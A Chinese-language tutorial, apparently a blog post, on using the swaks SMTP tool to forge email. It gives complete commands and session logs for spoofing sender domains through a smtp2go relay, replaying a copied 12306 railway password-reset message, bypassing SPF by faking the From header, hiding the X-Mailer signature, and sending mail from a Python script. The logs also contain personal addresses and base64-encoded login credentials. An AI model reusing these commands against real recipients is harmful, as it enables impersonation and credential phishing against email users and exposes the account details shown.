0x00 swaks简介
Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具,由John Jetmore编写和维护。
目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/
下载安装:(kali系统下自带,如果出错,可使用以下地址下载安装)
v20181104.0发行版:http://jetmore.org/john/code/swaks/files/swaks-20181104.0.tar.gz
前提条件:yum install perl (centos下)
tar zxvf swaks-20181104.0.tar.gz cd swaks-20181104.0. ./swaks
0x01 Swaks使用
1.基本使用语法:
1).swaks --to test@qq.com //测试邮箱的连通性;
root@localhost swaks-20181104.0]# ./swaks --to 60146@qq.com *** MX Routing not available: requires Net::DNS. Using localhost as mail server === Trying localhost:25... === Connected to localhost. <- 220 localhost.localdomain ESMTP Postfix -> EHLO localhost <- 250-localhost.localdomain <- 250-PIPELINING <- 250-SIZE 10240000 <- 250-VRFY <- 250-ETRN <- 250-ENHANCEDSTATUSCODES <- 250-8BITMIME <- 250 DSN -> MAIL FROM:<root@localhost> <- 250 2.1.0 Ok -> RCPT TO:<60146@qq.com> <- 250 2.1.5 Ok -> DATA <- 354 End data with <CR><LF>.<CR><LF> -> Date: Thu, 09 May 2019 18:24:15 +0800 -> To: 60146@qq.com -> From: root@localhost -> Subject: test Thu, 09 May 2019 18:24:15 +0800 -> Message-Id: <20190509182415.044457@localhost> -> X-Mailer: swaks v20181104.0 jetmore.org/john/code/swaks/ -> -> This is a test mailing -> -> -> . <- 250 2.0.0 Ok: queued as 056576152155 -> QUIT <- 221 2.0.0 Bye === Connection closed with remote host.
前面都返回250ok,说明该邮箱存在,并且可以正常收信。最后可以看到qq邮箱返回550错误,qq官方给出的出错原因:该邮件内容涉嫌大量群发,并且被多数用户投诉为垃圾邮件
2).参数说明(这里只是简单的罗列了一些,至于更加具体的内容可以使用--help进行查看了解)
--from test@qq.com //发件人邮箱; --ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证 --body "http://www.baidu.com" //引号中的内容即为邮件正文; --header "Subject:hello" //邮件头信息,subject为邮件标题 --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送
2.伪造发送 :
1)发送简单内容 (QQ的邮箱被SPF拦截,网易的可发送成功)
[root@localhost swaks-20181104.0]# ./swaks --to backli×@163.com --from wenqi×@gmail.com --body 诸葛先生,别来无恙~ --header "Subject: 来自大司马的问候" --server mail.smtp2go.com -p 2525 -au 用户名 -ap 密码 #这里需要到www.smtp2go.com下注册一个免费的发送的邮箱服务器的账号。如果不加--server则会显示错误“MX路由不可用: 使用localhost作为邮件服务器,需要设置Net :: DNS。 === Trying mail.smtp2go.com:2525... === Connected to mail.smtp2go.com. <- 220 mail.smtp2go.com ESMTP Exim 4.91 Thu, 09 May 2019 10:42:22 +0000 -> EHLO localhost <- 250-mail.smtp2go.com Hello localhost [171.223.206.218] <- 250-SIZE 52428800 <- 250-8BITMIME <- 250-DSN <- 250-PIPELINING <- 250-AUTH CRAM-MD5 PLAIN LOGIN <- 250-CHUNKING <- 250-STARTTLS <- 250-PRDR <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> YmFja2xpb24= <- 334 UGFzc3dvcmQ6 -> YWpWMmVtTnljRFp5ZWpobw== <- 235 Authentication succeeded -> MAIL FROM:<wenqing1293@gmail.com> <- 250 OK -> RCPT TO:<backlions@163.com> <- 250 Accepted <backlions@163.com> -> DATA <- 354 Enter message, ending with "." on a line by itself -> Date: Thu, 09 May 2019 18:42:21 +0800 -> To: backlions@163.com -> From: wenqing1293@gmail.com -> Subject: 来自大司马的问候 -> Message-Id: <20190509184221.044782@localhost> -> X-Mailer: swaks v20181104.0 jetmore.org/john/code/swaks/ -> -> 诸葛先生,别来无恙~ -> -> -> . <- 250 OK id=1hOgVO-RyuJx4-LX -> QUIT <- 221 mail.smtp2go.com closing connection === Connection closed with remote host.
2)发送邮件模板
模板文件由邮箱中"显示邮件原文" ,另存为 readmail.txt,删除 Received,To相关内容,具体参考高级用法。
[root@localhost swaks-20181104.0]# ./swaks --to backli×@163.com --from wenqin×@gamil.com --data test.eml --header "Subject: 网上购票系统-用 户密码找回" --server mail.smtp2go.com -p 2525 -au 用户名 -ap 密码
3)附加附件
[root@localhost swaks-20181104.0]# ./swaks --to backli×@163.com --from wenqi×@gmail.com --body 诸葛先生,别来无恙~ --header "Subject: 来自大司马的问候" --attach 等级保护.docx --server mail.smtp2go.com -p 2525 -au 用户名 -ap 密码
4).复杂邮件
swaks --to <要测试的邮箱> --from <被伪造的邮箱> --ehlo <网址> --body <邮件内容> --header <邮件标题>
[root@localhost swaks-20181104.0]# ./swaks --to backlions@163.com --from wenqing1293@gamil.com --ehlo freebuf.com --body hello --header "Subject: hello"
–from <要显示的发件人邮箱>
–ehlo <伪造的邮件ehlo头>
–body <邮件正文>
–header <邮件头信息,subject为邮件标题>
在你ip没有被qq邮箱band的情况下,邮件可以正常发送,返回250 ok
5)如果您的localhost无法发送邮件,您可以使用以下命令指定可靠的SMTP服务器:
swaks --to user@example.com --server smtp.example.com
3.高级用法
点击查看邮件原文,然后将邮件原文复制,另存为test.eml文件
对test.eml文件进行修改:to:后面的目标邮箱即可
[root@localhost swaks-20181104.0]# ./swaks --to backli×@163.com --from wenqin×@gamil.com --data test.eml --header "Subject: 网上购票系统-用 户密码找回" --server mail.smtp2go.com -p 2525 -au 用户名 -ap 密码 === Trying mail.smtp2go.com:2525... === Connected to mail.smtp2go.com. <- 220 mail.smtp2go.com ESMTP Exim 4.91 Thu, 09 May 2019 11:33:21 +0000 -> EHLO localhost <- 250-mail.smtp2go.com Hello localhost [171.223.206.218] <- 250-SIZE 52428800 <- 250-8BITMIME <- 250-DSN <- 250-PIPELINING <- 250-AUTH CRAM-MD5 PLAIN LOGIN <- 250-CHUNKING <- 250-STARTTLS <- 250-PRDR <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> YmFja2x× <- 334 UGFzc3dvcmQ6 -> YWpWMmVtTnljRFp5Z× <- 235 Authentication succeeded -> MAIL FROM:<wenqin×@gamil.com> <- 250 OK -> RCPT TO:<back×@163.com> <- 250 Accepted <bac×@163.com> -> DATA <- 354 Enter message, ending with "." on a line by itself -> Received: from mail.12306.cn (unknown [124.127.44.247]) -> by newmx31.qq.com (NewMx) with SMTP id -> for <601462×@qq.com>; Sun, 06 Jan 2019 12:40:30 +0800 -> X-QQ-FEAT: y37167hFrfVQgRwaJgHKCRxOzlAGmr/AUask8Gt3aaw= -> X-QQ-MAILINFO: MHG2h55yn1llklKTjNwQJdtfp46IVGVTPzA2xPoaUP1h+EXLeI+swrHhT -> mpCCV5gt0hGnIzMreYVhczG4URIQzkNwhHU6RpKU98dM9WIcUCqTnKVA+/bP9Cm4+epY5N1 -> rCpl5zs0xdiDi/Z/GS/ebiwHPp6QSatTZA== -> X-QQ-mid: mx31t1546749631tggruynog -> X-QQ-ORGSender: 12306@rails.com.cn -> Received: from mail.12306.cn (unknown [10.1.214.138]) -> by mail.12306.cn (Postfix) with ESMTP id 4C16720797 -> for <6014×0@qq.com>; Sun, 6 Jan 2019 12:40:32 +0800 (CST) -> Date: Sun, 6 Jan 2019 12:40:30 +0800 (CST) -> From: "12306@rails.com.cn" <12306@rails.com.cn> -> To: "backl×@163.com" <backlio×@163.com> -> Message-ID: <81646906.18623783.1546749630361@10.1.214.135> -> Subject: 网上购票系统-用户密码找回 -> MIME-Version: 1.0 -> Content-Type: multipart/alternative; -> boundary="----=_Part_18623781_1540198882.1546749630360" -> -> ------=_Part_18623781_1540198882.1546749630360 -> Content-Type: text/html; charset=gbk -> Content-Transfer-Encoding: quoted-printable -> -> <!DOCTYPE html> -> <html> -> <head> -> <meta charset=3D"utf-8"> -> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge,chrome=3D1"> -> <title>12306=CD=A8=D6=AA=D3=CA=BC=FE</title> -> <meta name=3D"description" content=3D""> -> <meta name=3D"keywords" content=3D""> -> <link href=3D"" rel=3D"stylesheet"> -> </head> -> <body> -> =09<table cellspacing=3D"0" cellpadding=3D"0" width=3D"760px" -> =09=09style=3D"border-spacing: 0; color: #333333; border: 1px solid #f1f1f1= -> ; margin-left: auto; margin-right: auto;"> -> =09=09<tr> -> =09=09=09<td width=3D"760"> -> =09=09=09=09<img src=3D"http://mobile.12306.cn/weixin/resources/weixin/imag= -> es/mail/mail_top.jpg" width=3D"760" height=3D"275"> -> =09=09=09</td> -> =09=09</tr> -> =09=09<tr> -> =09=09=09<td width=3D"720" -> =09=09=09=09style=3D"padding-left: 20px; padding-right: 20px; background: u= -> rl(http://mobile.12306.cn/weixin/resources/weixin/images/mail/mail_train.jp= -> g); background-position: bottom right; background-repeat: no-repeat;"> -> =09=09=09=09<table cellspacing=3D"0" cellpadding=3D"0" width=3D"720px" -> =09=09=09=09=09style=3D"border-spacing: 0; color: #333333;"> -> =09=09=09=09=09<tr> -> =09=09=09=09=09=09<td width=3D"720" -> =09=09=09=09=09=09=09style=3D"font-size: 16px; height: 40px; font-weight: b= -> old;"> -> =09=09=09=09=09=09=09=D7=F0=BE=B4=B5=C4 <span style=3D"color: #ff764c;">=CE= -> =C4=BA=A3=B8=D5=CF=C8=C9=FA=A3=BA</span> -> =09=09=09=09=09=09</td> -> =09=09=09=09=09</tr> -> =09=09=09=09=09<tr> -> =09=09=09=09=09=09<td width=3D"720"> -> =09=09=09=09=09=09=09<div style=3D"line-height: 20px; font-size: 12px;">=C4= -> =FA=BA=C3=A3=A1</div> -> =09=09=09=09=09=09=09<div style=3D"line-height: 20px; font-size: 12px;">=C4= -> =FA=D4=DA2019=C4=EA01=D4=C206=C8=D5 12=CA=B140=B7=D6=CC=E1=BD=BB=D5=D2=BB= -> =D8=C3=DC=C2=EB=C7=EB=C7=F3=A3=AC=C7=EB=B5=E3=BB=F7=CF=C2=C3=E6=B5=C4=C1=B4= -> =BD=D3=D0=DE=B8=C4=D3=C3=BB=A7wen129=B5=C4=C3=DC=C2=EB:</div> -> =09=09=09=09=09=09</td> -> =09=09=09=09=09</tr> -> =09=09=09=09=09<tr> -> =09=09=09=09=09=09<td width=3D"720" style=3D"padding-top: 10px; padding-bot= -> tom: 10px;"> -> =09=09=09=09=09=09=09<div style=3D"border-top: 1px dashed #e9ecf0; border-b= -> ottom: 1px dashed #e9ecf0; color: #000000; font-size: 14px; padding-top: 10= -> px; padding-bottom: 10px;"> -> =09=09=09=09=09=09=09=09<div style=3D"line-height: 20px; width:720px; color= -> : #000000; padding-top: 5px; padding-bottom: 5px; font-weight: bold;"> -> =09=09=09=09=09=09=09=09=09<a href=3Dhttps://kyfw.12306.cn/otn//forgetPassw= -> ord/changePassWord?uuId=3D5a3c9813-f6f6-4b6c-b7e7-6d634f06f0f1&lostTimeToDb= -> =3DF4AC92B54775FF543B1CDA2D8EB76EC9566489C1E9535098B1238FBC>https://kyfw.12= -> 306.cn/otn//forgetPassword/changePassWord?uuId=3D5a3c9813-f6f6-4b6c-b7e7-6d= -> 634f06f0f1&lostTimeToDb=3DF4AC92B54775FF543B1CDA2D8EB76EC9566489C1E9535098B= -> 1238FBC</a> -> =09=09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09=09=09 -> =09=09=09=09=09=09=09=09<div style=3D"line-height: 20px; color: #000000; pa= -> dding-top: 5px; padding-bottom: 5px; font-weight: bold;"> -> =09=09=09=09=09=09=09=09=09(=C8=E7=B9=FB=C4=FA=CE=DE=B7=A8=B5=E3=BB=F7=D5= -> =E2=B8=F6=C1=B4=BD=D3=A3=AC=C7=EB=BD=AB=B4=CB=C1=B4=BD=D3=B8=B4=D6=C6=B5=BD= -> =E4=AF=C0=C0=C6=F7=B5=D8=D6=B7=C0=B8=BA=F3=B7=C3=CE=CA) -> =09=09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09=09=09 -> =09=09=09=09=09=09=09=09<div style=3D"line-height: 20px; color: #000000; pa= -> dding-top: 5px; padding-bottom: 5px; font-weight: bold;"> -> =09=09=09=09=09=09=09=09=09=CE=AA=C1=CB=B1=A3=D6=A4=C4=FA=D5=CA=BA=C5=B5=C4= -> =B0=B2=C8=AB=D0=D4=A3=AC=B8=C3=C1=B4=BD=D3=D3=D0=D0=A7=C6=DA=CE=AA24=D0=A1= -> =CA=B1=A3=AC=B2=A2=C7=D2=B5=E3=BB=F7=D2=BB=B4=CE=BA=F3=BD=AB=CA=A7=D0=A7! -> =09=09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09=09=09<div style=3D"line-height: 20px; color: #000000; pa= -> dding-top: 5px; padding-bottom: 5px; font-weight: bold;"> -> =09=09=09=09=09=09=09=09=09=C9=E8=D6=C3=B2=A2=C0=CE=BC=C7=C3=DC=C2=EB=B1=A3= -> =BB=A4=CE=CA=CC=E2=BD=AB=B8=FC=BA=C3=B5=D8=B1=A3=D5=CF=C4=FA=B5=C4=D5=CA=BA= -> =C5=B0=B2=C8=AB=A1=A3 -> =09=09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09=09=09<div style=3D"line-height: 20px; color: #000000; pa= -> dding-top: 5px; padding-bottom: 5px; font-weight: bold;"> -> =09=09=09=09=09=09=09=09=09=C8=E7=B9=FB=C4=FA=CE=F3=CA=D5=B5=BD=B4=CB=B5=E7= -> =D7=D3=D3=CA=BC=FE=A3=AC=D4=F2=BF=C9=C4=DC=CA=C7=C6=E4=CB=FB=D3=C3=BB=A7=D4= -> =DA=B3=A2=CA=D4=D5=CA=BA=C5=C9=E8=D6=C3=CA=B1=B5=C4=CE=F3=B2=D9=D7=F7=A3=AC= -> =C8=E7=B9=FB=C4=FA=B2=A2=CE=B4=B7=A2=C6=F0=B8=C3=C7=EB=C7=F3=A3=AC=D4=F2=CE= -> =DE=D0=E8=D4=D9=BD=F8=D0=D0=C8=CE=BA=CE=B2=D9=D7=F7=A3=AC=B2=A2=BF=C9=D2=D4= -> =B7=C5=D0=C4=B5=D8=BA=F6=C2=D4=B4=CB=B5=E7=D7=D3=D3=CA=BC=FE=A1=A3 -> =09=09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09=09=09<div style=3D"line-height: 20px; color: #000000; pa= -> dding-top: 5px; padding-bottom: 5px; font-weight: bold;"> -> =09=09=09=09=09=09=09=09=09=C8=F4=C4=FA=B5=A3=D0=C4=D5=CA=BA=C5=B0=B2=C8=AB= -> =A3=AC=BD=A8=D2=E9=C4=FA=C1=A2=BC=B4=B5=C7=C2=BC=A3=AC=BD=F8=C8=EB=A1=B0=CE= -> =D2=B5=C412306=A1=B1=A3=AC=C3=DC=C2=EB=D0=DE=B8=C4=D6=D0=D0=DE=B8=C4=C3=DC= -> =C2=EB=A1=A3 -> =09=09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09=09</div> -> =09=09=09=09=09=09</td> -> =09=09=09=09=09</tr> -> =09=09=09=09=09<tr> -> =09=09=09=09=09=09<td width=3D"720"> -> =09=09=09=09=09=09=09<table cellspacing=3D"0" cellpadding=3D"0" width=3D"72= -> 0px" -> =09=09=09=09=09=09=09=09style=3D"border-spacing: 0; color: #333333;"> -> =09=09=09=09=09=09=09=09<tr> -> =09=09=09=09=09=09=09=09=09<td></td> -> =09=09=09=09=09=09=09=09=09<td width=3D"200" -> =09=09=09=09=09=09=09=09=09=09style=3D"text-align: center; height: 24px; fo= -> nt-size: 12px;"> -> =09=09=09=09=09=09=09=09=09=09<img src=3D"http://mobile.12306.cn/weixin/res= -> ources/weixin/images/mail/mail_logo.jpg" -> =09=09=09=09=09=09=09=09=09=09alt=3D"logo" width=3D"20" height=3D"20" -> =09=09=09=09=09=09=09=09=09=09style=3D"vertical-align: bottom; margin-right= -> : 10px;">=D6=D0=B9=FA=CC=FA=C2=B7=BF=CD=BB=A7=B7=FE=CE=F1=D6=D0=D0=C4 -> =09=09=09=09=09=09=09=09=09</td> -> =09=09=09=09=09=09=09=09</tr> -> =09=09=09=09=09=09=09=09<tr> -> =09=09=09=09=09=09=09=09=09<td></td> -> =09=09=09=09=09=09=09=09=09<td width=3D"200" -> =09=09=09=09=09=09=09=09=09=09style=3D"text-align: center; height: 24px; fo= -> nt-size: 12px;">2019=C4=EA01=D4=C206=C8=D5</td> -> =09=09=09=09=09=09=09=09</tr> -> =09=09=09=09=09=09=09</table> -> =09=09=09=09=09=09</td> -> =09=09=09=09=09</tr> -> =09=09=09=09=09<tr> -> =09=09=09=09=09=09<td width=3D"720" style=3D"padding-top: 10px; padding-bot= -> tom: 15px;"> -> =09=09=09=09=09=09=09<img src=3D"http://mobile.12306.cn/weixin/resources/we= -> ixin/images/mail/mail_line.jpg" alt=3D""> -> =09=09=09=09=09=09</td> -> =09=09=09=09=09</tr> -> =09=09=09=09</table> -> =09=09=09</td> -> =09=09</tr> -> =09</table> -> </body> -> </html> -> -> ------=_Part_18623781_1540198882.1546749630360-- -> -> -> . <- 250 OK id=1hOhIj-RyuRWW-5t -> QUIT <- 221 mail.smtp2go.com closing connection === Connection closed with remote host.
0x02 smtp2go配置
这个是从evi1cg师傅那里看到的,smtp2go主要是相当于邮件托管,可以分发子账户进行发送。
注册地址:https://www.smtp2go.com/
(邮箱注册)普通账户可以免费发1000封邮件。
这时候需要在设置菜单中的uses中新建一个账号,密码可以自动生成或者自己修改。
0x03 swaks发送邮件
swaks --to wenqing*@gmail.com --from admin@qq.com --ehlo gmail.com --body hello --server mail.smtp2go.com -p 2525 -au 用户名 -ap 密码
上面该命令也可绕过gamil邮件发送:
0x04 SPF验证原理
如果mail.smtp2go.com是我的邮件服务器,那么Gmail的服务器收到的源IP也肯定是mail.smtp2go.com的IP。
Gmail中会校验邮件发送者的IP是否存在于smtp.from的域名SPF配置列表里。
而上面这条命令:
swaks --to wenqing*@gmail.com --from admin@qq.com --ehlo gmail.com --body hello --server mail.smtp2go.com -p 2525 -au <USER> -ap <PASS>
smtp.from就是admin@qq.com,和mail.smtp2go.com的IP肯定不同,所以SPF校验失败,而校验失败的邮件,会有很高的几率被扔到垃圾邮件中。
默认情况下,如果未设置Mail.From也就是邮件头的发件人,则会使用smtp.from作为Mail.From。
0x05 绕过SPF
由于邮件显示的是接头连接器中的来自不是smtp.from,因此可以将smtp.from设置为正常的邮件服务器地址,伪造一个Mail.From即可。
swaks --to wenqi*@gmail.com --from what@smtp2go.com --h-From: '管理员<admin@qq.com>' --ehlo gmail.com --body hello --server mail.smtp2go.com -p 2525 -au 用户名 -ap 密码
Gmail中接收到这封邮件后,校验会--from xx@smtp2go.com中的smtp2go.com是否等于mail.smtp2go.com的IP,由于是相等的,所以完成了SPF的校验。
而DKIM是校验邮件完整性的,smtp2go与Gmail中直接使用的是TLS,不会发生什么问题。
0x06 修改标题
swaks支持自定义某些报头,参数如下:
swaks --header-<Name> <Value>
如果我想去除梅勒特征,就可以这么做:
swaks --header-X-Mailer gmail.com --to payloads@aliyun.com --from xx@smtp2go.com --h-From: '管理员<admin@qq.com>' --ehlo gmail.com --body hello --header "Subject: this is a test " --server mail.smtp2go.com -p 2525 -au <USER> -ap <PASSS>
0x07 Python脚本
#!/usr/bin/python # -*- coding: UTF-8 -*- import smtplib from email.mime.text import MIMEText from email.header import Header mail_host="mail.smtp2go.com" mail_user="" mail_pass="" sender = 'test@smtp2go.com' receivers = ['rvn0xsy@gmail.com'] message = MIMEText('Hello World', 'plain', 'utf-8') message['From'] = Header("from@qq.com", 'utf-8') message['To'] = Header(receivers[0], 'utf-8') subject = 'SMTP 邮件测试' message['Subject'] = Header(subject, 'utf-8') try: smtpObj = smtplib.SMTP() smtpObj.connect(mail_host, 25) smtpObj.login(mail_user,mail_pass) smtpObj.sendmail(sender, receivers, message.as_string()) print "Success" except smtplib.SMTPException: print "Error"
0x08 总结
经测试,通过swaks 加smtp2go中转服务器可以绕过icloud.com ,aliyun.com,gmail.com,163.com等邮箱的SPF进行邮件伪造。
0x09 参考文献
https://payloads.online/archivers/2019-05-09/1